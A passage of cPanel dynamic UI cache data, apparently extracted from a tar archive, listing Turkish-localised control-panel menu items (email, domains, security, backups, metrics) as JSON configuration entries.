Installer","base64_png_image":"","type":"image","plainitemdesc":"Softaculous Apps Installer","target":"","imgtype":"icon","acontent":"","subtype":"img","itemdesc":"Softaculous Apps Installer","width":"48","itemorder":"99","file":"softaculous"},"email_deliverability":{"file":"email_deliverability","subtype":"img","acontent":"","itemorder":"11","itemdesc":"Email Deliverability","width":"48","imgtype":"icon","if":"$HASROLE{'MailSend'}","type":"image","plainitemdesc":"Email Deliverability","target":"","key":"email_deliverability","searchtext":"email Authentication Email Deliverability spf domain-keys authentication DKIM","description":"Identify problems with your mail-related DNS records for one or more of your domains.","base64_png_image":"","onclick":"","feature":"emailauth","height":"48","implements":"Email_Authentication","url":"email_deliverability/","group":"email"},"ls_web_cache_manager":{"file":"ls_web_cache_manager","width":"48","itemdesc":"LiteSpeed Web Cache Manager","itemorder":"1","subtype":"img","acontent":"","imgtype":"icon","target":"","plainitemdesc":"LiteSpeed Web Cache Manager","type":"image","base64_png_image":"","searchtext":"LiteSpeed Web Cache Manager","description":"LiteSpeed Web Cache Manager","height":"48","feature":"ls_web_cache_manager","onclick":"","group":"advanced","url":"ls_web_cache_manager.html.tt"},"two_factor_authentication":{"file":"two_factor_authentication","itemorder":"8","width":"48","itemdesc":"İki Faktörlü Doğrulama","acontent":"","subtype":"img","imgtype":"icon","plainitemdesc":"Two-Factor Authentication","target":"","type":"image","if":"$is_twofactorauth_sec_policy_enabled","base64_png_image":"","key":"two_factor_authentication","searchtext":"İki Faktörlü Doğrulama 2fa tfa","description":"Configure a security measure that requires two forms of identification to log in.","height":"48","onclick":"","feature":"twofactorauth","group":"security","url":"security/2fa/index.html"},"dynamic_dns":{"url":"dynamic-dns/index.html","group":"domains","key":"dynamic_dns","description":"Manage your dynamic DNS domains.","searchtext":"dynamic dns ddns ip subdomain Dynamic DNS","base64_png_image":"","onclick":"","feature":"dynamicdns","height":48,"imgtype":"icon","if":"$HASROLE{'DNS'}","type":"image","plainitemdesc":"Dynamic DNS","target":"","file":"dynamic_dns","subtype":"img","acontent":"","itemorder":9,"width":48,"itemdesc":"Dynamic DNS"},"address_importer":{"url":"mail/csvimport.html","group":"email","onclick":"","feature":"csvimport","height":"48","key":"address_importer","searchtext":"Adres Aktarıcısı Adresleri Aktar İleticiler Posta csv aktar xls aktar","description":"Use a spreadsheet or comma-separated value text file to quickly create mailboxes or forwarders.","base64_png_image":"","type":"image","if":"$HASROLE{'MailReceive'}","plainitemdesc":"Address Importer","target":"","imgtype":"icon","subtype":"img","acontent":"","itemorder":"12","width":"48","itemdesc":"Adres Aktarıcısı","file":"address_importer"},"ip_blocker":{"imgtype":"icon","target":"","plainitemdesc":"IP Blocker","if":"$HASROLE{'WebServer'}","type":"image","file":"ip_blocker","itemorder":"2","itemdesc":"IP Engelleyici","width":"48","subtype":"img","acontent":"","group":"security","url":"denyip/index.html","base64_png_image":"","key":"ip_blocker","searchtext":"IP Engelleyici ip reddetme yöneticisi","description":"Block access to your website for one or more IP addresses or fully qualified domain names.","height":"48","onclick":"","feature":"ipdeny"},"email_accounts":{"file":"email_accounts","subtype":"img","acontent":"","itemorder":"1","width":"48","itemdesc":"E-posta Hesapları","imgtype":"icon","if":"$HASROLE{'MailReceive'}","type":"image","target":"","plainitemdesc":"Email Accounts","key":"email_accounts","description":"Create, manage, and delete email accounts.","searchtext":"e-posta hesapları posta pop imap smtp E-posta Hesapları","base64_png_image":"","onclick":"","feature":"popaccts","height":"48","implements":"Email_Accounts","url":"email_accounts/index.html","group":"email"},"jetbackupsingle":{"url":"jetbackup/index.html#!/","group":"files","searchtext":"JetBackup","description":"JetBackup","base64_png_image":"","feature":"jetbackupsingle","onclick":"","height":"48","imgtype":"icon","type":"image","target":"","plainitemdesc":"JetBackup","file":"jetbackupsingle","acontent":"","subtype":"img","width":"48","itemdesc":"JetBackup","itemorder":0},"webalizer":{"group":"metrics","url":"stats/webalizer_landing.html","height":"48","onclick":"","feature":"webalizer","base64_png_image":"","key":"webalizer","description":"View traffic statistics from the Webalizer statistics program.","searchtext":"Webalizer istatistikleri","target":"","plainitemdesc":"Webalizer","if":"$HASROLE{'WebServer'} && !$CONFIF{'skipwebalizer'}","type":"image","imgtype":"icon","itemorder":"7","itemdesc":"Webalizer","width":"48","acontent":"","subtype":"img","file":"webalizer"},"ftp_accounts":{"file":"ftp_accounts","touch":"ftp","acontent":"","subtype":"img","itemdesc":"FTP Hesapları","width":"48","itemorder":"6","imgtype":"icon","type":"image","if":"$SERVICEPROVIDED{'ftp'}","plainitemdesc":"FTP Accounts","target":"","description":"Create, manage, and delete FTP accounts.","searchtext":"FTP Hesapları ftp oluştur","key":"ftp_accounts","base64_png_image":"","feature":"ftpaccts","onclick":"","height":"48","url":"ftp/accounts.html","group":"files"},"hotlink_protection":{"group":"security","url":"mime/hotlink.html","base64_png_image":"","key":"hotlink_protection","description":"Prevent external sites and users from embedding your website’s content.","searchtext":"Hotlink Koruması","height":"48","onclick":"","feature":"hotlink","imgtype":"icon","plainitemdesc":"Hotlink Protection","target":"","type":"image","if":"$HASROLE{'WebServer'}","file":"hotlink_protection","itemorder":"4","itemdesc":"Hotlink Koruması","width":"48","acontent":"","subtype":"img"},"php_pear_packages":{"target":"","plainitemdesc":"PHP PEAR Packages","if":"$haspear","type":"image","imgtype":"icon","width":"48","itemdesc":"PHP PEAR Paketleri","itemorder":"2","acontent":"","subtype":"img","file":"php_pear_packages","group":"software","url":"module_installers/index.html?lang=php-pear","height":"48","feature":"modules-php-pear","onclick":"","base64_png_image":"","searchtext":"PHP PEAR Paketleri","description":"Search for and add PEAR packages to your website, or view your available PHP packages.","key":"php_pear_packages"},"visitors":{"group":"metrics","url":"stats/lastvisitors_landing.html","height":"48","feature":"lastvisits","onclick":"","base64_png_image":"","searchtext":"en son ziyaretçiler Ziyaretçiler","description":"Display detailed information about recent visits to your website.","key":"visitors","plainitemdesc":"Visitors","target":"","type":"image","if":"$HASROLE{'WebServer'}","imgtype":"icon","width":"48","itemdesc":"Ziyaretçiler","itemorder":"1","subtype":"img","acontent":"","file":"visitors"},"imunify360":{"plainitemdesc":"Imunify360","target":"","type":"image","imgtype":"icon","width":"48","itemdesc":"Imunify360","itemorder":"10000","acontent":"","subtype":"img","file":"imunify360","group":"security","url":"imunify/imunify.live.pl","implements":"Imunify_Home","height":"48","feature":"imunify360","onclick":"","base64_png_image":"","description":"Imunify360","searchtext":"Imunify360"},"php_my_admin":{"imgtype":"icon","if":"$SERVICEPROVIDED{'mysql'}","type":"image","plainitemdesc":"phpMyAdmin","target":"phpmyadmin","file":"php_my_admin","subtype":"img","acontent":"target=\"phpmyadmin\"","itemdesc":"phpMyAdmin","width":"48","itemorder":"1","implements":"Database_phpMyAdmin","url":"sql/PhpMyAdmin.html","group":"databases","description":"Manage MySQL® databases.","searchtext":"phpMyAdmin database db","key":"php_my_admin","base64_png_image":"","feature":"phpmyadmin","onclick":"","height":"48"},"tls_status":{"feature":"sslinstall","onclick":"","height":"48","description":"View, upgrade, or renew your domains’ SSLcertificates.","searchtext":"SSL/TLS Status","key":"tls_status","base64_png_image":"","url":"security/tls_status/","group":"security","implements":"SSL_TLS_Status","subtype":"img","acontent":"","width":"48","itemdesc":"SSL/TLS Status","itemorder":"7","file":"tls_status","type":"image","if":"$HASROLE{'UserSSL'}","plainitemdesc":"[asis,SSL]/[asis,TLS] Status","target":"","imgtype":"icon"},"metrics_editor":{"key":"metrics_editor","description":"Select metrics programs to process your log files and provide traffic analysis for your cPanel account’s domains.","searchtext":"Metrik Düzenleyici istatistik yöneticisi günlük programlarını seç Metrik Düzenleyicisi","base64_png_image":"","onclick":"","feature":"statselect","height":"32","url":"statmanager/index.html","group":"metrics","file":"metrics_editor","acontent":"","subtype":"img","itemorder":"10","itemdesc":"Metrik Düzenleyicisi","width":"32","imgtype":"icon","type":"image","if":"$HASROLE{'WebServer'} && $any_stats_enabled","plainitemdesc":"Metrics Editor","target":""},"greylisting":{"subtype":"img","acontent":"","itemdesc":"Gri Listeye Alma İşlemini Yapılandır","width":"48","itemorder":"17","file":"greylisting","type":"image","if":"$HASROLE{'MailReceive'} && $is_greylisting_enabled","target":"","plainitemdesc":"Configure Greylisting","imgtype":"icon","feature":"greylist","onclick":"","height":"48","description":"Enable or disable protection against unwanted email or spam.","searchtext":"Gri liste istenmeyen postaların gri listeye alınması Gri Listeye Alma İşlemini Yapılandır","key":"greylisting","base64_png_image":"","url":"mail/greylisting/index.html","group":"email","implements":"Email_GreyListing"},"track_dns":{"searchtext":"DNS İzle traceroute tracert dnslookup delme ağ araçları DNS’i İzle","description":"Perform traceroutes and domain lookups to diagnose network issues.","key":"track_dns","base64_png_image":"","feature":"nettools","onclick":"","height":"48","url":"net/index.html","group":"advanced","file":"track_dns","acontent":"","subtype":"img","width":"48","itemdesc":"DNS’i İzle","itemorder":"3","imgtype":"icon","type":"image","target":"","plainitemdesc":"Track DNS"},"mailing_lists":{"imgtype":"icon","type":"image","if":"$HASROLE{'MailReceive'} && $HASROLE{'MailSend'} && !$CONFIF{'skipmailman'}","target":"","plainitemdesc":"Mailing Lists","file":"mailing_lists","subtype":"img","acontent":"","itemorder":"7","width":"48","itemdesc":"Posta Listeleri","implements":"Email_MailingLists","url":"mail/lists.html","group":"email","key":"mailing_lists","description":"Set up a single email address to send mail to multiple email addresses.","searchtext":"Posta Listeleri mailman","base64_png_image":"","onclick":"","feature":"lists","height":"48"},"jetbackupsettings":{"description":"Ayarlar","searchtext":"Ayarlar","base64_png_image":"","feature":"jetbackupsettings","onclick":"","height":"48","url":"jetbackup/index.html#!/settings","group":"jetbackup","file":"jetbackupsettings","subtype":"img","acontent":"","width":"48","itemdesc":"Ayarlar","itemorder":"11","imgtype":"icon","type":"image","target":"","plainitemdesc":"Settings"},"site_publisher":{"acontent":"","subtype":"img","itemorder":"1","width":"48","itemdesc":"Site Yayımlayıcısı","file":"site_publisher","type":"image","if":"$HASROLE{'WebServer'}","plainitemdesc":"Site Publisher","target":"","imgtype":"icon","onclick":"","feature":"sitepublisher","height":"48","key":"site_publisher","searchtext":"site yayımlayıcı oluşturucu web sitesi oluşturucusunu başlat şablon Site Yayımlayıcısı","description":"Create a simple website as a placeholder.","base64_png_image":"","url":"site_publisher/index.html","group":"domains"},"domains":{"implements":"Domains_domains","url":"domains/index.html","group":"domains","searchtext":"domains parked park aliases alias addon subdomain domain force https redirect Etki Alanları","description":"Create, manage, and delete multiple domains.","key":"domains","base64_png_image":"","feature":"addondomains || subdomains || parkeddomains || sslinstall","onclick":"","imagetype":"icon","height":"48","type":"image","target":"","plainitemdesc":"Domains","file":"domains","acontent":"","subtype":"img","itemdesc":"Etki Alanları","width":"48","itemorder":"2"},"group_perf":{"group":"preferences","groupdesc":"Tercihler","height":"48","onclick":"","base64_png_image":"","description":"Tercihler","searchtext":"group_perf","key":"group_perf","target":"","type":"image","imgtype":"icon","grouporder":"8","itemdesc":"group_perf","width":"48","acontent":"","subtype":"img","file":"group_perf"},"security_policy":{"key":"security_policy","description":"Update and manage your security questions.","searchtext":"Güvenlik İlkesi","base64_png_image":"","onclick":"","height":"32","url":"security/index.html","group":"security","file":"security_policy","subtype":"img","acontent":"","itemorder":"6","itemdesc":"Güvenlik İlkesi","width":"32","imgtype":"icon","if":"$CONFIF{'SecurityPolicy::SourceIPCheck'}","type":"image","target":"","plainitemdesc":"Security Policy"},"site_software":{"target":"","plainitemdesc":"Site Software","type":"image","if":"$HASROLE{'WebServer'}","imgtype":"icon","cpanel_os_check":"supports_cpaddons=1","width":"32","itemdesc":"Site Yazılımı","itemorder":"6","file_check":"!/var/cpanel/cpaddons.disabled","subtype":"img","acontent":"","file":"site_software","group":"software","url":"addoncgi/cpaddons.html","implements":"Site_Software","height":"32","feature":"addoncgi","onclick":"","base64_png_image":"","searchtext":"Site Yazılımı eklentiler yazılım","description":"Update, manage, and uninstall cPAddons.","key":"site_software"},"raw_access":{"file":"raw_access","width":"48","itemdesc":"Ham Erişim","itemorder":"4","acontent":"","subtype":"img","imgtype":"icon","plainitemdesc":"Raw Access","target":"","if":"$HASROLE{'WebServer'}","type":"image","base64_png_image":"","searchtext":"Ham Erişim günlükler ham günlükler hamgünlükler","description":"View the raw Apache® logs for your site’s visitors.","key":"raw_access","height":"48","feature":"rawlog","onclick":"","group":"metrics","url":"raw/index.html"},"soft_div_icons":{"height":"48","onclick":"","feature":"soft_div_icons","base64_png_image":"","searchtext":"Softaculous Apps Installer","description":"Softaculous Apps Installer","group":"soft_div","url":"softaculous/index.live.php","itemorder":"10","width":"48","itemdesc":"Softaculous Apps Installer","subtype":"img","acontent":"","file":"soft_div_icons","target":"","plainitemdesc":"Softaculous Apps Installer","type":"image","imgtype":"icon"},"indexes":{"file":"indexes","itemdesc":"İndeksler","width":"48","itemorder":"4","subtype":"img","acontent":"","imgtype":"icon","target":"","plainitemdesc":"Indexes","type":"image","if":"$HASROLE{'WebServer'}","base64_png_image":"","searchtext":"İndeksler indeks yöneticisi","description":"Define how the server displays a specific directory’s index to a visitor, or to disable index display for a directory.","key":"indexes","height":"48","feature":"indexmanager","onclick":"","group":"advanced","url":"indexmanager/index.html"},"ssl_tls":{"base64_png_image":"","description":"Create, manage, and delete SSL certificates, signing requests, and keys.","searchtext":"SSL/TLS sertifika anahtarı csr","key":"ssl_tls","height":"48","feature":"sslmanager","onclick":"","implements":"SSL_TLS_Manager","group":"security","url":"ssl/index.html","file":"ssl_tls","width":"48","itemdesc":"SSL/TLS","itemorder":"3","subtype":"img","acontent":"","imgtype":"icon","target":"","plainitemdesc":"SSL/TLS","type":"image","if":"$HASROLE{'UserSSL'}"},"group_jetbackup":{"imgtype":"icon","grouporder":"1","target":"","type":"image","file":"group_jetbackup","itemdesc":"group_jetbackup","width":"32","subtype":"img","acontent":"","groupdesc":"JetBackup","group":"jetbackup","base64_png_image":"","description":"JetBackup","searchtext":"group_jetbackup","height":"32","onclick":""},"cron_jobs":{"file":"cron_jobs","subtype":"img","acontent":"","width":"48","itemdesc":"Cron İşleri","itemorder":"2","imgtype":"icon","if":"$HASROLE{'WebServer'}","type":"image","plainitemdesc":"Cron Jobs","target":"","description":"Create, manage, and delete scheduled tasks.","searchtext":"Cron İşleri cron işi cron sekmesi düzenle","key":"cron_jobs","base64_png_image":"","feature":"cron","onclick":"","height":"48","implements":"Cron_Home","url":"cron/index.html","group":"advanced"},"mysql_manager":{"imgtype":"icon","type":"image","if":"$experimental{'mysql_manager'}","target":"","plainitemdesc":"MySQL® Manager","file":"mysql_manager","acontent":"","subtype":"img","width":48,"itemdesc":"MySQL® Manager","itemorder":1,"url":"mysql-manager/index.html","group":"databases","description":"Create, manage, and delete MySQL® databases and database users.","searchtext":"mysql manager database db MySQL® Manager","key":"mysql_manager","base64_png_image":"","feature":"mysql_manager","onclick":"","height":48},"email_filters":{"url":"mail/filters/managefilters.html","group":"email","implements":"Email_UserLevelFiltering","feature":"blockers","onclick":"","height":"48","searchtext":"Kullanıcı Filtreleri E-posta kullanıcı düzeyi Filtreleme filtre E-posta Filtreleri","description":"Configure how your server filters a specific email account’s received mail.","key":"email_filters","base64_png_image":"","type":"image","if":"$HASROLE{'MailReceive'}","plainitemdesc":"Email Filters","target":"","imgtype":"icon","subtype":"img","acontent":"","width":"48","itemdesc":"E-posta Filtreleri","itemorder":"10","file":"email_filters"},"email_disk_usage":{"group":"email","url":"mail/manage_disk_usage/","implements":"Email_Disk_Usage","height":"48","onclick":"","feature":"popaccts && email_disk_usage","base64_png_image":"","key":"email_disk_usage","description":"View your mailboxes and disk usage for each, and remove old or large messages.","searchtext":"email accounts mail disk usage bytes mb size Email Disk Usage","target":"","plainitemdesc":"Email Disk Usage","if":"$HASROLE{'MailReceive'}","type":"image","imgtype":"icon","itemorder":"19","itemdesc":"Email Disk Usage","width":"48","subtype":"img","acontent":"","file":"email_disk_usage"},"cpanel-sitejet-plugin":{"url":"sitejet/index.html","group":"domains","searchtext":"sitejet builder domain website plugin Sitejet Builder","description":"Sitejet Builder","base64_png_image":"","onclick":"","feature":"sitejet","height":"48","imgtype":"icon","type":"image","if":"$HASROLE{'WebServer'}","plainitemdesc":"Sitejet Builder","target":"","file":"cpanel-sitejet-plugin","subtype":"img","acontent":"","itemorder":"2","width":"48","itemdesc":"Sitejet Builder"},"jetbackupsnapshots":{"feature":"jetbackupsnapshots","onclick":"","height":"48","searchtext":"Snapshots","description":"Snapshots","base64_png_image":"","url":"jetbackup/index.html#!/snapshots","group":"jetbackup","acontent":"","subtype":"img","itemdesc":"Snapshots","width":"48","itemorder":"9","file":"jetbackupsnapshots","type":"image","plainitemdesc":"Snapshots","target":"","imgtype":"icon"},"track_delivery":{"implements":"Email_DeliveryReport","group":"email","url":"mail/route.html","base64_png_image":"","searchtext":"İletilen E-postayı İzle, E-postayı İzle, posta iletim raporu Gönderimi İzle","description":"Display reports about email message delivery attempts.","key":"track_delivery","height":"48","feature":"emailtrace","onclick":"","imgtype":"icon","target":"","plainitemdesc":"Track Delivery","type":"image","if":"$HASROLE{'MailReceive'} && $HASROLE{'MailSend'}","file":"track_delivery","itemdesc":"Gönderimi İzle","width":"48","itemorder":"8","subtype":"img","acontent":""},"group_sample_apps":{"height":"48","onclick":"","base64_png_image":"","key":"group_sample_apps","description":"Sample Applications","searchtext":"group_sample_apps","group":"sample_apps","groupdesc":"Sample Applications","width":"48","itemdesc":"group_sample_apps","acontent":"","subtype":"img","file":"group_sample_apps","target":"","type":"image","imgtype":"icon","grouporder":"9"},"canary":{"file":"canary","subtype":"img","acontent":"","itemorder":"1","width":"48","itemdesc":"Canary","imgtype":"icon","if":"$is_sandbox && $exists_in_cpanel{'canary'}","type":"image","target":"","key":"canary","searchtext":"sample apps Canary","description":"Canary","base64_png_image":"","onclick":"","height":"48","url":"canary/index.html","group":"sample_apps"},"lveresusage":{"group":"metrics","url":"resource_usage/resource_usage.live.pl","base64_png_image":"","description":"Resource Usage","searchtext":"Resource Usage","height":"48","onclick":"","feature":"lveresusage","imgtype":"icon","plainitemdesc":"Resource Usage","target":"","type":"image","file":"lveresusage","itemorder":"999","itemdesc":"Resource Usage","width":"48","subtype":"img","acontent":""},"contact_information":{"file":"contact_information","acontent":"","subtype":"img","itemorder":"3","width":"48","itemdesc":"İletişim Bilgileri","imgtype":"icon","type":"image","plainitemdesc":"Contact Information","target":"","key":"contact_information","description":"Set contact information and preferences.","searchtext":"iletişim e-posta İletişim Bilgileri","base64_png_image":"","onclick":"","feature":"updatenotificationprefs || updatecontact","height":"48","implements":"ContactInfo_Change","url":"contact/index.html","group":"preferences"}}} caches/dynamicui/paper_lantern_tr_.cache 0000640 00000171710 15025306757 0014454 0 ustar 00 {"conf":{"security_policy":{"searchtext":"Güvenlik İlkesi","width":"32","file":"security_policy","itemorder":"6","acontent":"","description":"Güvenlik İlkesi","onclick":"","subtype":"img","base64_png_image":"","key":"security_policy","target":"","height":"32","itemdesc":"Güvenlik İlkesi","plainitemdesc":"Security Policy","group":"security","type":"image","if":"$CONFIF{'SecurityPolicy::SourceIPCheck'}","imgtype":"icon","url":"security/index.html"},"webalizer_ftp":{"touch":"ftp","type":"image","itemdesc":"Webalizer FTP","group":"metrics","plainitemdesc":"Webalizer FTP","if":"!$CONFIF{'skipwebalizer'}","imgtype":"icon","url":"stats/webalizerftp_landing.html","searchtext":"Webalizer FTP stats ftp","width":"48","file":"webalizer_ftp","acontent":"","itemorder":"8","base64_png_image":"","onclick":"","feature":"webalizer","subtype":"img","description":"Webalizer FTP","target":"","height":"48","key":"webalizer_ftp"},"ip_blocker":{"searchtext":"IP Engelleyici ip reddetme yöneticisi","width":"48","file":"ip_blocker","itemorder":"2","acontent":"","feature":"ipdeny","onclick":"","subtype":"img","description":"IP Engelleyici","base64_png_image":"","key":"ip_blocker","height":"48","target":"","itemdesc":"IP Engelleyici","plainitemdesc":"IP Blocker","group":"security","type":"image","if":"$HASROLE{'WebServer'}","imgtype":"icon","url":"denyip/index.html"},"apache_spam_assassin":{"url":"mail/spam/index.html","imgtype":"icon","type":"image","plainitemdesc":"Spam Filters","group":"email","itemdesc":"Spam Filters","if":"$HASROLE{'SpamFilter'} && !$CONFIF{'skipspamassassin'}","implements":"Email_SpamFilter","base64_png_image":"","subtype":"img","onclick":"","description":"Spam Filters","feature":"spamassassin","height":"48","target":"","key":"apache_spam_assassin","searchtext":"Filtering Spam Assassin spamassassin Apache SpamAssassin Spam Filters","width":"48","file":"apache_spam_assassin","acontent":"","itemorder":"13"},"ssh_access":{"searchtext":"SSH erişimi ssh/kabuk Erişim ssh güvenli kabuk sftp SSH Erişimi","file":"ssh_access","width":"48","itemorder":"1","acontent":"","base64_png_image":"","onclick":"","subtype":"img","feature":"ssh","description":"SSH Erişimi","height":"48","target":"","key":"ssh_access","type":"image","itemdesc":"SSH Erişimi","plainitemdesc":"SSH Access","group":"security","imgtype":"icon","url":"telnet/index.html"},"group_software":{"base64_png_image":"","onclick":"","subtype":"img","description":"Yazılım","target":"","height":"48","key":"group_software","grouporder":"6","file":"group_software","searchtext":"group_software","width":"48","acontent":"","groupdesc":"Yazılım","imgtype":"icon","type":"image","group":"software","itemdesc":"group_software","if":"$HASROLE{'WebServer'}"},"errors":{"target":"","height":"48","key":"errors","base64_png_image":"","description":"Hatalar","onclick":"","subtype":"img","feature":"errlog","itemorder":"2","acontent":"","searchtext":"Hatalar hata günlüğü hata günlüğü","file":"errors","width":"48","url":"stats/errlog.html","imgtype":"icon","if":"$HASROLE{'WebServer'}","type":"image","itemdesc":"Hatalar","group":"metrics","plainitemdesc":"Errors"},"group_jetbackup":{"subtype":"img","onclick":"","description":"JetBackup","base64_png_image":"","height":"47","target":"","searchtext":"group_jetbackup","file":"group_jetbackup","width":"47","grouporder":"1","groupdesc":"JetBackup","acontent":"","imgtype":"icon","itemdesc":"group_jetbackup","group":"jetbackup","type":"image"},"group_sample_apps":{"width":"48","searchtext":"group_sample_apps","file":"group_sample_apps","grouporder":"9","groupdesc":"Sample Applications","acontent":"","base64_png_image":"","subtype":"img","onclick":"","description":"Sample Applications","target":"","height":"48","key":"group_sample_apps","type":"image","itemdesc":"group_sample_apps","group":"sample_apps","imgtype":"icon"},"backup_wizard":{"itemdesc":"Yedekleme Sihirbazı","plainitemdesc":"Backup Wizard","group":"files","type":"image","if":"$HASROLE{'MailReceive'} || $HASROLE{'FileStorage'} || $SERVICEPROVIDED{'mysql'}","url":"backup/wizard.html","imgtype":"icon","searchtext":"Yedekleme Sihirbazı geri yükleme","file":"backup_wizard","width":"48","itemorder":"9","acontent":"","subtype":"img","onclick":"","feature":"backup","description":"Yedekleme Sihirbazı","base64_png_image":"","key":"backup_wizard","height":"48","target":""},"site_software":{"group":"software","itemdesc":"Site Yazılımı","cpanel_os_check":"supports_cpaddons=1","imgtype":"icon","url":"addoncgi/cpaddons.html","itemorder":"6","acontent":"","width":"32","file":"site_software","height":"32","key":"site_software","subtype":"img","if":"$HASROLE{'WebServer'}","file_check":"!/var/cpanel/cpaddons.disabled","type":"image","plainitemdesc":"Site Software","searchtext":"Site Yazılımı eklentiler yazılım","target":"","implements":"Site_Software","base64_png_image":"","onclick":"","description":"Site Yazılımı","feature":"addoncgi"},"track_dns":{"itemorder":"3","acontent":"","searchtext":"DNS İzle traceroute tracert dnslookup delme ağ araçları DNS’i İzle","file":"track_dns","width":"48","target":"","height":"48","key":"track_dns","base64_png_image":"","description":"DNS’i İzle","onclick":"","subtype":"img","feature":"nettools","type":"image","group":"advanced","plainitemdesc":"Track DNS","itemdesc":"DNS’i İzle","url":"net/index.html","imgtype":"icon"},"metrics_editor":{"url":"statmanager/index.html","imgtype":"icon","type":"image","plainitemdesc":"Metrics Editor","group":"metrics","itemdesc":"Metrik Düzenleyicisi","if":"$HASROLE{'WebServer'} && $any_stats_enabled","base64_png_image":"","onclick":"","subtype":"img","feature":"statselect","description":"Metrik Düzenleyicisi","height":"32","target":"","key":"metrics_editor","width":"32","searchtext":"Metrik Düzenleyici istatistik yöneticisi günlük programlarını seç Metrik Düzenleyicisi","file":"metrics_editor","acontent":"","itemorder":"10"},"email_routing":{"if":"$HASROLE{'MailReceive'} && !$HASCHILDNODE{Mail}","type":"image","itemdesc":"E-posta Yönlendirmesi","plainitemdesc":"Email Routing","group":"email","url":"mail/email_routing.html","imgtype":"icon","itemorder":"4","acontent":"","searchtext":"MX Entry Email Routing dns E-posta Yönlendirmesi","file":"email_routing","width":"48","target":"","height":"48","key":"email_routing","implements":"Email_Routing","base64_png_image":"","onclick":"","subtype":"img","description":"E-posta Yönlendirmesi","feature":"changemx"},"perl_modules":{"file":"perl_modules","searchtext":"Perl Modülleri","width":"48","itemorder":"3","acontent":"","subtype":"img","onclick":"","description":"Perl Modülleri","feature":"modules-perl","base64_png_image":"","key":"perl_modules","height":"48","target":"","group":"software","plainitemdesc":"Perl Modules","itemdesc":"Perl Modülleri","type":"image","if":"$hasperl","url":"module_installers/index.html?lang=perl","imgtype":"icon"},"api_tokens":{"implements":"API_Tokens_Manager","base64_png_image":"","description":"Manage API Tokens","onclick":"","subtype":"img","feature":"apitokens","height":"48","target":"","key":"api_tokens","searchtext":"Manage API Tokens access api connect login","file":"api_tokens","width":"48","itemorder":"4","acontent":"","url":"api_tokens/index.html","imgtype":"icon","type":"image","itemdesc":"Manage API Tokens","plainitemdesc":"Manage API Tokens","group":"security"},"lveresusage":{"itemorder":"999","acontent":"","searchtext":"Resource Usage","width":"47","file":"lveresusage","height":"47","target":"","onclick":"","description":"Resource Usage","subtype":"img","feature":"lveresusage","base64_png_image":"","group":"metrics","plainitemdesc":"Resource Usage","itemdesc":"Resource Usage","type":"image","imgtype":"icon","url":"resource_usage/resource_usage.live.pl"},"subdomains":{"implements":"Domains_SubDomains","base64_png_image":"","feature":"subdomains","onclick":"","subtype":"img","description":"Alt Etki Alanları","target":"","height":"48","key":"subdomains","searchtext":"Alt Etki Alanları etki alanı","file":"subdomains","width":"48","acontent":"","itemorder":"4","imgtype":"icon","url":"subdomain/index.html","type":"image","plainitemdesc":"Subdomains","group":"domains","itemdesc":"Alt Etki Alanları","if":"$HASROLE{'WebServer'}"},"jetbackupdbbackups":{"acontent":"","itemorder":"5","width":"47","searchtext":"Database Backups","file":"jetbackupdbbackups","height":"47","target":"","base64_png_image":"","onclick":"","subtype":"img","feature":"jetbackupdbbackups","description":"Database Backups","type":"image","itemdesc":"Database Backups","plainitemdesc":"Database Backups","group":"jetbackup","url":"jetbackup/index.html#!/dbBackups","imgtype":"icon"},"global_email_filters":{"acontent":"","itemorder":"9","width":"48","searchtext":"Genel E-Posta Filtreleri filtre hesap seviyesi filtreleme Genel E-posta Filtreleri","file":"global_email_filters","key":"global_email_filters","target":"","height":"48","subtype":"img","onclick":"","description":"Genel E-posta Filtreleri","feature":"blockers","base64_png_image":"","implements":"Email_AccountLevelFiltering","if":"$HASROLE{'MailReceive'}","plainitemdesc":"Global Email Filters","group":"email","itemdesc":"Genel E-posta Filtreleri","type":"image","url":"mail/filters/userfilters.html","imgtype":"icon"},"imunify-antivirus":{"acontent":"","itemorder":"10000","searchtext":"ImunifyAV","file":"imunify-antivirus","width":"47","target":"","height":"47","onclick":"","subtype":"img","description":"ImunifyAV","feature":"imunify-antivirus","base64_png_image":"","plainitemdesc":"ImunifyAV","group":"security","itemdesc":"ImunifyAV","type":"image","imgtype":"icon","url":"imunify/imunify.live.pl"},"jetbackupdnsbackups":{"acontent":"","itemorder":"4","searchtext":"DNS Zone Backups","file":"jetbackupdnsbackups","width":"47","target":"","height":"47","onclick":"","subtype":"img","feature":"jetbackupdnsbackups","description":"DNS Zone Backups","base64_png_image":"","group":"jetbackup","plainitemdesc":"DNS Zone Backups","itemdesc":"DNS Zone Backups","type":"image","url":"jetbackup/index.html#!/dnsBackups","imgtype":"icon"},"calendar_and_contacts":{"searchtext":"e-posta takvim kişi adres defteri CalDAV CardDAV Takvimler ve Kişiler","width":"48","file":"calendar_and_contacts","itemorder":"18","acontent":"","implements":"Calendar_Configure","base64_png_image":"","onclick":"","description":"Takvimler ve Kişiler","subtype":"img","feature":"caldavcarddav","target":"","height":"48","key":"calendar_and_contacts","type":"image","itemdesc":"Takvimler ve Kişiler","group":"email","plainitemdesc":"Calendars and Contacts","if":"$HASROLE{'CalendarContact'} && $hashorde && $hascpdavd","url":"mail/calendars_and_contacts/index.html","imgtype":"icon"},"awstats":{"url":"stats/awstats_landing.html","imgtype":"icon","if":"$HASROLE{'WebServer'} && !$CONFIF{'skipawstats'}","type":"image","group":"metrics","plainitemdesc":"Awstats","itemdesc":"Awstats","target":"","height":"48","key":"awstats","implements":"Stats_AWStats","base64_png_image":"","feature":"awstats","onclick":"","subtype":"img","description":"Awstats","acontent":"","itemorder":"5","searchtext":"Awstats awstats","file":"awstats","width":"48"},"clam_av":{"itemorder":"8","acontent":"","width":"48","searchtext":"Virüs Tarayıcısı clam clamav antivirüs","file":"clam_av","height":"48","target":"","key":"clam_av","base64_png_image":"","feature":"clamavconnector_scan","onclick":"","subtype":"img","description":"Virüs Tarayıcı","if":"$hasclamav && $HASROLE{'MailReceive'}","type":"image","touch":"clamav","group":"advanced","plainitemdesc":"Virus Scanner","itemdesc":"Virüs Tarayıcı","url":"clam-av/index.html","imgtype":"icon"},"default_address":{"subtype":"img","onclick":"","description":"Varsayılan Adres","feature":"defaultaddress","base64_png_image":"","implements":"Email_DefaultAddress","key":"default_address","target":"","height":"48","width":"48","searchtext":"Varsayılan Adres","file":"default_address","acontent":"","itemorder":"6","imgtype":"icon","url":"mail/def.html","itemdesc":"Varsayılan Adres","plainitemdesc":"Default 